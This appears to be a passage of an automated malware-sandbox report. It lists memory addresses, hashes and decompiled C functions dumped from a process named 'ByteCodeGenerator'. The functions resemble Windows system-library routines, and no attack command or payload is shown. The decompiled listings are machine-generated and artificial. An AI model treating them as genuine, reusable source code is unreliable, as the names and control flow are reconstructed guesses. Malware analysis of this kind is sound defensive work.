                                  0x0345d302
                                  0x0345d303
                                  0x0345d30b
                                  0x0345d30f
                                  0x0345d313
                                  0x0345d318
                                  0x0345d31c
                                  0x0345d320
                                  0x0345d379
                                  0x0345d37d
                                  0x00000000
                                  0x00000000
                                  0x0349affe
                                  0x0349b001
                                  0x0349b011
                                  0x00000000
                                  0x0345d322
                                  0x0345d322
                                  0x0345d330
                                  0x0345d337
                                  0x0345d35d
                                  0x0345d339
                                  0x0345d33f
                                  0x0345d38c
                                  0x0345d38c
                                  0x0345d33f
                                  0x0345d349
                                  0x00000000
                                  0x0345d349

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  • Opcode ID: 6ec3cf95acdb19fed6e6b883da304873d42dc9a3a4944707c28f40ac55ed6b89
                                  • Instruction ID: 4618f1a029bbaeb447b3cef3ef4646b26fa9ac5ba023f3a8897f9eb9aeedceec
                                  • Opcode Fuzzy Hash: 6ec3cf95acdb19fed6e6b883da304873d42dc9a3a4944707c28f40ac55ed6b89
                                  • Instruction Fuzzy Hash: 8B31CFB5D083009FC710DF29C98096BBBE8EF96654F04092FF9948B211D634DD09CB9B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E03431B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                  				intOrPtr _v8;
                                  				char _v16;
                                  				intOrPtr* _t26;
                                  				intOrPtr _t29;
                                  				void* _t30;
                                  				signed int _t31;
                                  
                                  				_t27 = __ecx;
                                  				_t29 = __edx;
                                  				_t31 = 0;
                                  				_v8 = __edx;
                                  				if(__edx == 0) {
                                  					L18:
                                  					_t30 = 0xc000000d;
                                  					goto L12;
                                  				} else {
                                  					_t26 = _a4;
                                  					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                  						goto L18;
                                  					} else {
                                  						E0346BB40(__ecx,  &_v16, __ecx);
                                  						_push(_t26);
                                  						_push(0);
                                  						_push(0);
                                  						_push(_t29);
                                  						_push( &_v16);
                                  						_t30 = E0346A9B0();
                                  						if(_t30 >= 0) {
                                  							_t19 =  *_t26;
                                  							if( *_t26 != 0) {
                                  								goto L7;
                                  							} else {
                                  								 *_a8 =  *_a8 & 0;
                                  							}
                                  						} else {
                                  							if(_t30 != 0xc0000023) {
                                  								L9:
                                  								_push(_t26);
                                  								_push( *_t26);
                                  								_push(_t31);
                                  								_push(_v8);
                                  								_push( &_v16);
                                  								_t30 = E0346A9B0();
                                  								if(_t30 < 0) {
                                  									L12:
                                  									if(_t31 != 0) {
                                  										L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                  									}
                                  								} else {
                                  									 *_a8 = _t31;
                                  								}
                                  							} else {
                                  								_t19 =  *_t26;
                                  								if( *_t26 == 0) {
                                  									_t31 = 0;
                                  								} else {
                                  									L7:
                                  									_t31 = L03444620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                  								}
                                  								if(_t31 == 0) {
                                  									_t30 = 0xc0000017;
                                  								} else {
                                  									goto L9;
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t30;
                                  			}









                                  0x03431b8f
                                  0x03431b9a
                                  0x03431b9c
                                  0x03431b9e
                                  0x03431ba3
                                  0x03487010
                                  0x03487010
                                  0x00000000
                                  0x03431ba9
                                  0x03431ba9
                                  0x03431bae
                                  0x00000000
                                  0x03431bc5
                                  0x03431bca
                                  0x03431bcf
                                  0x03431bd0
                                  0x03431bd1
                                  0x03431bd2
                                  0x03431bd6
                                  0x03431bdc
                                  0x03431be0
                                  0x03486ffc
                                  0x03487000
                                  0x00000000
                                  0x03487006
                                  0x03487009
                                  0x03487009
                                  0x03431be6
                                  0x03431bec
                                  0x03431c0b
                                  0x03431c0b
                                  0x03431c0c
                                  0x03431c11
                                  0x03431c12
                                  0x03431c15
                                  0x03431c1b
                                  0x03431c1f
                                  0x03431c31
                                  0x03431c33
                                  0x03487026
                                  0x03487026
                                  0x03431c21
                                  0x03431c24
                                  0x03431c24
                                  0x03431bee
                                  0x03431bee
                                  0x03431bf2
                                  0x03431c3a
                                  0x03431bf4
                                  0x03431bf4
                                  0x03431c05
                                  0x03431c05
                                  0x03431c09
                                  0x03431c3e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03431c09
                                  0x03431bec
                                  0x03431be0
                                  0x03431bae
                                  0x03431c2e

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: WindowsExcludedProcs
                                  • API String ID: 0-3583428290
                                  • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                  • Instruction ID: 4618f87a4b39547e1a801a1027472bd1d3948d0d66c03b0aabc8f5bd960d87a9
                                  • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                  • Instruction Fuzzy Hash: 9C21F576500228ABDB21FE56C940F5FBBADEF4AA50F294467FD149F300D634DC0297A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0344F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                  				intOrPtr _t13;
                                  				intOrPtr _t14;
                                  				signed int _t16;
                                  				signed char _t17;
                                  				intOrPtr _t19;
                                  				intOrPtr _t21;
                                  				intOrPtr _t23;
                                  				intOrPtr* _t25;
                                  
                                  				_t25 = _a8;
                                  				_t17 = __ecx;
                                  				if(_t25 == 0) {
                                  					_t19 = 0xc00000f2;
                                  					L8:
                                  					return _t19;
                                  				}
                                  				if((__ecx & 0xfffffffe) != 0) {
                                  					_t19 = 0xc00000ef;
                                  					goto L8;
                                  				}
                                  				_t19 = 0;
                                  				 *_t25 = 0;
                                  				_t21 = 0;
                                  				_t23 = "Actx ";
                                  				if(__edx != 0) {
                                  					if(__edx == 0xfffffffc) {
                                  						L21:
                                  						_t21 = 0x200;
                                  						L5:
                                  						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                  						 *_t25 = _t13;
                                  						L6:
                                  						if(_t13 == 0) {
                                  							if((_t17 & 0x00000001) != 0) {
                                  								 *_t25 = _t23;
                                  							}
                                  						}
                                  						L7:
                                  						goto L8;
                                  					}
                                  					if(__edx == 0xfffffffd) {
                                  						 *_t25 = _t23;
                                  						_t13 = _t23;
                                  						goto L6;
                                  					}
                                  					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                  					 *_t25 = _t13;
                                  					L14:
                                  					if(_t21 == 0) {
                                  						goto L6;
                                  					}
                                  					goto L5;
                                  				}
                                  				_t14 = _a4;
                                  				if(_t14 != 0) {
                                  					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                  					if(_t16 <= 1) {
                                  						_t21 = 0x1f8;
                                  						_t13 = 0;
                                  						goto L14;
                                  					}
                                  					if(_t16 == 2) {
                                  						goto L21;
                                  					}
                                  					if(_t16 != 4) {
                                  						_t19 = 0xc00000f0;
                                  						goto L7;
                                  					}
                                  					_t13 = 0;
                                  					goto L6;
                                  				} else {
                                  					_t21 = 0x1f8;
                                  					goto L5;
                                  				}
                                  			}











                                  0x0344f71d
                                  0x0344f722
                                  0x0344f726
                                  0x03494770
                                  0x0344f765
                                  0x0344f769
                                  0x0344f769
                                  0x0344f732
                                  0x0349477a
                                  0x00000000
                                  0x0349477a
                                  0x0344f738
                                  0x0344f73a
                                  0x0344f73c
                                  0x0344f73f
                                  0x0344f746
                                  0x0344f778
                                  0x0344f7a9
                                  0x0344f7a9
                                  0x0344f754
                                  0x0344f75a
                                  0x0344f75d
                                  0x0344f75f
                                  0x0344f761
                                  0x0344f76f
                                  0x0344f771
                                  0x0344f771
                                  0x0344f76f
                                  0x0344f763
                                  0x00000000
                                  0x0344f763
                                  0x0344f77d
                                  0x0344f7a3
                                  0x0344f7a5
                                  0x00000000
                                  0x0344f7a5
                                  0x0344f77f
                                  0x0344f782
                                  0x0344f784
                                  0x0344f786
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0344f788
                                  0x0344f748
                                  0x0344f74d
                                  0x0344f78d
                                  0x0344f793
                                  0x0344f7b7
                                  0x0344f7bc
                                  0x00000000
                                  0x0344f7bc
                                  0x0344f798
                                  0x00000000
                                  0x00000000
                                  0x0344f79d
                                  0x0344f7b0
                                  0x00000000
                                  0x0344f7b0
                                  0x0344f79f
                                  0x00000000
                                  0x0344f74f
                                  0x0344f74f
                                  0x00000000
                                  0x0344f74f

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Actx
                                  • API String ID: 0-89312691
                                  • Opcode ID: c876832febed516f7873b0e8ebc1405623fe0cdbdcebca40f0790810f63aa65c
                                  • Instruction ID: 856c3542bccd04d44f378b8023e194f9fc5df757bb8110a0cc52f77a2f1e2ff5
                                  • Opcode Fuzzy Hash: c876832febed516f7873b0e8ebc1405623fe0cdbdcebca40f0790810f63aa65c
                                  • Instruction Fuzzy Hash: D41190397446028BFB24CE1D8B90737B299AB86624F28453BE471CF791DB78D84A8748
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E034D8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr _t35;
                                  				void* _t41;
                                  
                                  				_t40 = __esi;
                                  				_t39 = __edi;
                                  				_t38 = __edx;
                                  				_t35 = __ecx;
                                  				_t34 = __ebx;
                                  				_push(0x74);
                                  				_push(0x3500d50);
                                  				E0347D0E8(__ebx, __edi, __esi);
                                  				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                  				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                  				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                  					E034B5720(0x65, 0, "Critical error detected %lx\n", _t35);
                                  					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                  						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                  						asm("int3");
                                  						 *(_t41 - 4) = 0xfffffffe;
                                  					}
                                  				}
                                  				 *(_t41 - 4) = 1;
                                  				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                  				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                  				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                  				 *((intOrPtr*)(_t41 - 0x64)) = L0347DEF0;
                                  				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                  				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                  				_push(_t41 - 0x70);
                                  				L0347DEF0(1, _t38);
                                  				 *(_t41 - 4) = 0xfffffffe;
                                  				return E0347D130(_t34, _t39, _t40);
                                  			}





                                  0x034d8df1
                                  0x034d8df1
                                  0x034d8df1
                                  0x034d8df1
                                  0x034d8df1
                                  0x034d8df1
                                  0x034d8df3
                                  0x034d8df8
                                  0x034d8dfd
                                  0x034d8e00
                                  0x034d8e0e
                                  0x034d8e2a
                                  0x034d8e36
                                  0x034d8e38
                                  0x034d8e3c
                                  0x034d8e46
                                  0x034d8e46
                                  0x034d8e36
                                  0x034d8e50
                                  0x034d8e56
                                  0x034d8e59
                                  0x034d8e5c
                                  0x034d8e60
                                  0x034d8e67
                                  0x034d8e6d
                                  0x034d8e73
                                  0x034d8e74
                                  0x034d8eb1
                                  0x034d8ebd

                                  Strings
                                  • Critical error detected %lx, xrefs: 034D8E21
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Critical error detected %lx
                                  • API String ID: 0-802127002
                                  • Opcode ID: 8eb7f48143ccc6a3e8921816bcb6a4e3622458d2df26c93a56c4b66f5d57f172
                                  • Instruction ID: cabe79984ab49d29ccad83b017cd9bb0ff1769bf27605a8066f0b23599838449
                                  • Opcode Fuzzy Hash: 8eb7f48143ccc6a3e8921816bcb6a4e3622458d2df26c93a56c4b66f5d57f172
                                  • Instruction Fuzzy Hash: A21123B5D24348DADB29DFA989057EDBBB0AB05314F24425ED469AF292C3344602CF19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 034BFF60
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                  • API String ID: 0-1911121157
                                  • Opcode ID: 95afbf42ba6020e3855cdcf1a57e6400945c7ad50e350eca0c77b1f1999f71db
                                  • Instruction ID: 2cfcc3ebeaa324d5151f810858270cf137fea4819c52f6b7bb3c8bde7e1c96fe
                                  • Opcode Fuzzy Hash: 95afbf42ba6020e3855cdcf1a57e6400945c7ad50e350eca0c77b1f1999f71db
                                  • Instruction Fuzzy Hash: 3511E175920244EFDB12EF50CD48FD9BBB1FF09704F18845AE0086F2A1C7399954DB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 88%
                                  			E034F5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				signed int _t296;
                                  				signed char _t298;
                                  				signed int _t301;
                                  				signed int _t306;
                                  				signed int _t310;
                                  				signed char _t311;
                                  				intOrPtr _t312;
                                  				signed int _t313;
                                  				void* _t327;
                                  				signed int _t328;
                                  				intOrPtr _t329;
                                  				intOrPtr _t333;
                                  				signed char _t334;
                                  				signed int _t336;
                                  				void* _t339;
                                  				signed int _t340;
                                  				signed int _t356;
                                  				signed int _t362;
                                  				short _t367;
                                  				short _t368;
                                  				short _t373;
                                  				signed int _t380;
                                  				void* _t382;
                                  				short _t385;
                                  				signed short _t392;
                                  				signed char _t393;
                                  				signed int _t395;
                                  				signed char _t397;
                                  				signed int _t398;
                                  				signed short _t402;
                                  				void* _t406;
                                  				signed int _t412;
                                  				signed char _t414;
                                  				signed short _t416;
                                  				signed int _t421;
                                  				signed char _t427;
                                  				intOrPtr _t434;
                                  				signed char _t435;
                                  				signed int _t436;
                                  				signed int _t442;
                                  				signed int _t446;
                                  				signed int _t447;
                                  				signed int _t451;
                                  				signed int _t453;
                                  				signed int _t454;
                                  				signed int _t455;
                                  				intOrPtr _t456;
                                  				intOrPtr* _t457;
                                  				short _t458;
                                  				signed short _t462;
                                  				signed int _t469;
                                  				intOrPtr* _t474;
                                  				signed int _t475;
                                  				signed int _t479;
                                  				signed int _t480;
                                  				signed int _t481;
                                  				short _t485;
                                  				signed int _t491;
                                  				signed int* _t494;
                                  				signed int _t498;
                                  				signed int _t505;
                                  				intOrPtr _t506;
                                  				signed short _t508;
                                  				signed int _t511;
                                  				void* _t517;
                                  				signed int _t519;
                                  				signed int _t522;
                                  				void* _t523;
                                  				signed int _t524;
                                  				void* _t528;
                                  				signed int _t529;
                                  
                                  				_push(0xd4);
                                  				_push(0x3501178);
                                  				E0347D0E8(__ebx, __edi, __esi);
                                  				_t494 = __edx;
                                  				 *(_t528 - 0xcc) = __edx;
                                  				_t511 = __ecx;
                                  				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                  				 *(_t528 - 0xbc) = __ecx;
                                  				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                  				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                  				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                  				_t427 = 0;
                                  				 *(_t528 - 0x74) = 0;
                                  				 *(_t528 - 0x9c) = 0;
                                  				 *(_t528 - 0x84) = 0;
                                  				 *(_t528 - 0xac) = 0;
                                  				 *(_t528 - 0x88) = 0;
                                  				 *(_t528 - 0xa8) = 0;
                                  				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                  				if( *(_t528 + 0x1c) <= 0x80) {
                                  					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                  					if(__eflags != 0) {
                                  						_t421 = E034F4C56(0, __edx, __ecx, __eflags);
                                  						__eflags = _t421;
                                  						if(_t421 != 0) {
                                  							 *((intOrPtr*)(_t528 - 4)) = 0;
                                  							E0346D000(0x410);
                                  							 *(_t528 - 0x18) = _t529;
                                  							 *(_t528 - 0x9c) = _t529;
                                  							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                  							E034F5542(_t528 - 0x9c, _t528 - 0x84);
                                  						}
                                  					}
                                  					_t435 = _t427;
                                  					 *(_t528 - 0xd0) = _t435;
                                  					_t474 = _t511 + 0x65;
                                  					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                  					_t511 = 0x18;
                                  					while(1) {
                                  						 *(_t528 - 0xa0) = _t427;
                                  						 *(_t528 - 0xbc) = _t427;
                                  						 *(_t528 - 0x80) = _t427;
                                  						 *(_t528 - 0x78) = 0x50;
                                  						 *(_t528 - 0x79) = _t427;
                                  						 *(_t528 - 0x7a) = _t427;
                                  						 *(_t528 - 0x8c) = _t427;
                                  						 *(_t528 - 0x98) = _t427;
                                  						 *(_t528 - 0x90) = _t427;
                                  						 *(_t528 - 0xb0) = _t427;
                                  						 *(_t528 - 0xb8) = _t427;
                                  						_t296 = 1 << _t435;
                                  						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                  						__eflags = _t436 & _t296;
                                  						if((_t436 & _t296) != 0) {
                                  							goto L92;
                                  						}
                                  						__eflags =  *((char*)(_t474 - 1));
                                  						if( *((char*)(_t474 - 1)) == 0) {
                                  							goto L92;
                                  						}
                                  						_t301 =  *_t474;
                                  						__eflags = _t494[1] - _t301;
                                  						if(_t494[1] <= _t301) {
                                  							L10:
                                  							__eflags =  *(_t474 - 5) & 0x00000040;
                                  							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                  								L12:
                                  								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                  								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                  									goto L92;
                                  								}
                                  								_t442 =  *(_t474 - 0x11) & _t494[3];
                                  								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                  								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                  									goto L92;
                                  								}
                                  								__eflags = _t442 -  *(_t474 - 0x11);
                                  								if(_t442 !=  *(_t474 - 0x11)) {
                                  									goto L92;
                                  								}
                                  								L15:
                                  								_t306 =  *(_t474 + 1) & 0x000000ff;
                                  								 *(_t528 - 0xc0) = _t306;
                                  								 *(_t528 - 0xa4) = _t306;
                                  								__eflags =  *0x35160e8;
                                  								if( *0x35160e8 != 0) {
                                  									__eflags = _t306 - 0x40;
                                  									if(_t306 < 0x40) {
                                  										L20:
                                  										asm("lock inc dword [eax]");
                                  										_t310 =  *0x35160e8; // 0x0
                                  										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                  										__eflags = _t311 & 0x00000001;
                                  										if((_t311 & 0x00000001) == 0) {
                                  											 *(_t528 - 0xa0) = _t311;
                                  											_t475 = _t427;
                                  											 *(_t528 - 0x74) = _t427;
                                  											__eflags = _t475;
                                  											if(_t475 != 0) {
                                  												L91:
                                  												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                  												goto L92;
                                  											}
                                  											asm("sbb edi, edi");
                                  											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                  											_t511 = _t498;
                                  											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                  											__eflags =  *(_t312 - 5) & 1;
                                  											if(( *(_t312 - 5) & 1) != 0) {
                                  												_push(_t528 - 0x98);
                                  												_push(0x4c);
                                  												_push(_t528 - 0x70);
                                  												_push(1);
                                  												_push(0xfffffffa);
                                  												_t412 = E03469710();
                                  												_t475 = _t427;
                                  												__eflags = _t412;
                                  												if(_t412 >= 0) {
                                  													_t414 =  *(_t528 - 0x98) - 8;
                                  													 *(_t528 - 0x98) = _t414;
                                  													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                  													 *(_t528 - 0x8c) = _t416;
                                  													 *(_t528 - 0x79) = 1;
                                  													_t511 = (_t416 & 0x0000ffff) + _t498;
                                  													__eflags = _t511;
                                  												}
                                  											}
                                  											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                  											__eflags = _t446 & 0x00000004;
                                  											if((_t446 & 0x00000004) != 0) {
                                  												__eflags =  *(_t528 - 0x9c);
                                  												if( *(_t528 - 0x9c) != 0) {
                                  													 *(_t528 - 0x7a) = 1;
                                  													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                  													__eflags = _t511;
                                  												}
                                  											}
                                  											_t313 = 2;
                                  											_t447 = _t446 & _t313;
                                  											__eflags = _t447;
                                  											 *(_t528 - 0xd4) = _t447;
                                  											if(_t447 != 0) {
                                  												_t406 = 0x10;
                                  												_t511 = _t511 + _t406;
                                  												__eflags = _t511;
                                  											}
                                  											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                  											 *(_t528 - 0x88) = _t427;
                                  											__eflags =  *(_t528 + 0x1c);
                                  											if( *(_t528 + 0x1c) <= 0) {
                                  												L45:
                                  												__eflags =  *(_t528 - 0xb0);
                                  												if( *(_t528 - 0xb0) != 0) {
                                  													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                  													__eflags = _t511;
                                  												}
                                  												__eflags = _t475;
                                  												if(_t475 != 0) {
                                  													asm("lock dec dword [ecx+edx*8+0x4]");
                                  													goto L100;
                                  												} else {
                                  													_t494[3] = _t511;
                                  													_t451 =  *(_t528 - 0xa0);
                                  													_t427 = E03466DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                  													 *(_t528 - 0x88) = _t427;
                                  													__eflags = _t427;
                                  													if(_t427 == 0) {
                                  														__eflags = _t511 - 0xfff8;
                                  														if(_t511 <= 0xfff8) {
                                  															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                  															asm("sbb ecx, ecx");
                                  															__eflags = (_t451 & 0x000000e2) + 8;
                                  														}
                                  														asm("lock dec dword [eax+edx*8+0x4]");
                                  														L100:
                                  														goto L101;
                                  													}
                                  													_t453 =  *(_t528 - 0xa0);
                                  													 *_t494 = _t453;
                                  													_t494[1] = _t427;
                                  													_t494[2] =  *(_t528 - 0xbc);
                                  													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                  													 *_t427 =  *(_t453 + 0x24) | _t511;
                                  													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                  													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                  													asm("movsd");
                                  													asm("movsd");
                                  													asm("movsd");
                                  													asm("movsd");
                                  													asm("movsd");
                                  													asm("movsd");
                                  													asm("movsd");
                                  													asm("movsd");
                                  													__eflags =  *(_t528 + 0x14);
                                  													if( *(_t528 + 0x14) == 0) {
                                  														__eflags =  *[fs:0x18] + 0xf50;
                                  													}
                                  													asm("movsd");
                                  													asm("movsd");
                                  													asm("movsd");
                                  													asm("movsd");
                                  													__eflags =  *(_t528 + 0x18);
                                  													if( *(_t528 + 0x18) == 0) {
                                  														_t454 =  *(_t528 - 0x80);
                                  														_t479 =  *(_t528 - 0x78);
                                  														_t327 = 1;
                                  														__eflags = 1;
                                  													} else {
                                  														_t146 = _t427 + 0x50; // 0x50
                                  														_t454 = _t146;
                                  														 *(_t528 - 0x80) = _t454;
                                  														_t382 = 0x18;
                                  														 *_t454 = _t382;
                                  														 *((short*)(_t454 + 2)) = 1;
                                  														_t385 = 0x10;
                                  														 *((short*)(_t454 + 6)) = _t385;
                                  														 *(_t454 + 4) = 0;
                                  														asm("movsd");
                                  														asm("movsd");
                                  														asm("movsd");
                                  														asm("movsd");
                                  														_t327 = 1;
                                  														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                  														_t479 = 0x68;
                                  														 *(_t528 - 0x78) = _t479;
                                  													}
                                  													__eflags =  *(_t528 - 0x79) - _t327;
                                  													if( *(_t528 - 0x79) == _t327) {
                                  														_t524 = _t479 + _t427;
                                  														_t508 =  *(_t528 - 0x8c);
                                  														 *_t524 = _t508;
                                  														_t373 = 2;
                                  														 *((short*)(_t524 + 2)) = _t373;
                                  														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                  														 *((short*)(_t524 + 4)) = 0;
                                  														_t167 = _t524 + 8; // 0x8
                                  														E0346F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                  														_t529 = _t529 + 0xc;
                                  														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                  														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                  														 *(_t528 - 0x78) = _t479;
                                  														_t380 =  *(_t528 - 0x80);
                                  														__eflags = _t380;
                                  														if(_t380 != 0) {
                                  															_t173 = _t380 + 4;
                                  															 *_t173 =  *(_t380 + 4) | 1;
                                  															__eflags =  *_t173;
                                  														}
                                  														_t454 = _t524;
                                  														 *(_t528 - 0x80) = _t454;
                                  														_t327 = 1;
                                  														__eflags = 1;
                                  													}
                                  													__eflags =  *(_t528 - 0xd4);
                                  													if( *(_t528 - 0xd4) == 0) {
                                  														_t505 =  *(_t528 - 0x80);
                                  													} else {
                                  														_t505 = _t479 + _t427;
                                  														_t523 = 0x10;
                                  														 *_t505 = _t523;
                                  														_t367 = 3;
                                  														 *((short*)(_t505 + 2)) = _t367;
                                  														_t368 = 4;
                                  														 *((short*)(_t505 + 6)) = _t368;
                                  														 *(_t505 + 4) = 0;
                                  														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                  														_t327 = 1;
                                  														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                  														_t479 = _t479 + _t523;
                                  														 *(_t528 - 0x78) = _t479;
                                  														__eflags = _t454;
                                  														if(_t454 != 0) {
                                  															_t186 = _t454 + 4;
                                  															 *_t186 =  *(_t454 + 4) | 1;
                                  															__eflags =  *_t186;
                                  														}
                                  														 *(_t528 - 0x80) = _t505;
                                  													}
                                  													__eflags =  *(_t528 - 0x7a) - _t327;
                                  													if( *(_t528 - 0x7a) == _t327) {
                                  														 *(_t528 - 0xd4) = _t479 + _t427;
                                  														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                  														E0346F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                  														_t529 = _t529 + 0xc;
                                  														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                  														_t479 =  *(_t528 - 0x78) + _t522;
                                  														 *(_t528 - 0x78) = _t479;
                                  														__eflags = _t505;
                                  														if(_t505 != 0) {
                                  															_t199 = _t505 + 4;
                                  															 *_t199 =  *(_t505 + 4) | 1;
                                  															__eflags =  *_t199;
                                  														}
                                  														_t505 =  *(_t528 - 0xd4);
                                  														 *(_t528 - 0x80) = _t505;
                                  													}
                                  													__eflags =  *(_t528 - 0xa8);
                                  													if( *(_t528 - 0xa8) != 0) {
                                  														_t356 = _t479 + _t427;
                                  														 *(_t528 - 0xd4) = _t356;
                                  														_t462 =  *(_t528 - 0xac);
                                  														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                  														_t485 = 0xc;
                                  														 *((short*)(_t356 + 2)) = _t485;
                                  														 *(_t356 + 6) = _t462;
                                  														 *((short*)(_t356 + 4)) = 0;
                                  														_t211 = _t356 + 8; // 0x9
                                  														E0346F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                  														E0346FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                  														_t529 = _t529 + 0x18;
                                  														_t427 =  *(_t528 - 0x88);
                                  														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                  														_t505 =  *(_t528 - 0xd4);
                                  														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                  														 *(_t528 - 0x78) = _t479;
